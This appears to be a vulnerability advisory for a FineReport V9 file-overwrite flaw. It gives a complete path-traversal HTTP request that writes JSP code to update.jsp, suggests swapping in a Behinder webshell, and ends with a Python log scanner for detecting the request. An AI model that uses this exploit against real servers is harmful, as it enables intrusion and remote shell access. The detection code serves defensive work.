0x00 Arbitrary file upload vulnerability [ FineReport V9 ]
0x01 Vulnerability description
This vulnerability is an arbitrary file overwrite. To upload a JSP webshell, an existing JSP file has to be found and overwritten, so look for a JSP file that exists by default after Tomcat starts Fanruan.
0x02 Vulnerability details
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8
Content-Length: 74

{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}
Replacing the payload with the Behinder ("Ice Scorpion") webshell gives a shell on the server.
0x03 Temporary fix suggestion
Check whether a Fanruan system is in use, and apply a corresponding custom rule on the AF for access to the webroot/ReportServer path.
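To support that check, the following added example (not part of the original advisory or of Fanruan's code) scans web access logs for the request shape shown in 0x02: op=svginit with cmd=design_save_svg and a filePath that leaves its directory or names a JSP file. It assumes common/combined access-log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2021:10:00:01 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Mar/2021:10:00:09 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg%2f%2e%2e%2f%2e%2e%2fWebReport%2fupdate.jsp HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Mar/2021:10:02:30 +0800] "POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/china.svg HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Mar/2021:10:03:12 +0800] "GET /WebReport/ReportServer?reportlet=demo.cpt HTTP/1.1" 200 512',
]

def fully_decode(value, rounds=3):
    """Percent-decode until stable so the path is compared in normalized form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a reason string if the line matches the advisory's request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/reportserver"):
        return None
    params = {k.lower(): v[-1] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    if params.get("op", "").lower() != "svginit" or params.get("cmd", "").lower() != "design_save_svg":
        return None
    path = fully_decode(params.get("filepath", "")).replace("\\", "/")
    if ".." in path.split("/"):
        return "design_save_svg with path traversal in filePath"
    if path.lower().endswith((".jsp", ".jspx")):
        return "design_save_svg writing a JSP file"
    return None

def scan(lines):
    """Return (line_number, reason) for every suspicious log line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

A hit on a server that returned 200 warrants comparing the targeted JSP file's modification time and content against a clean install.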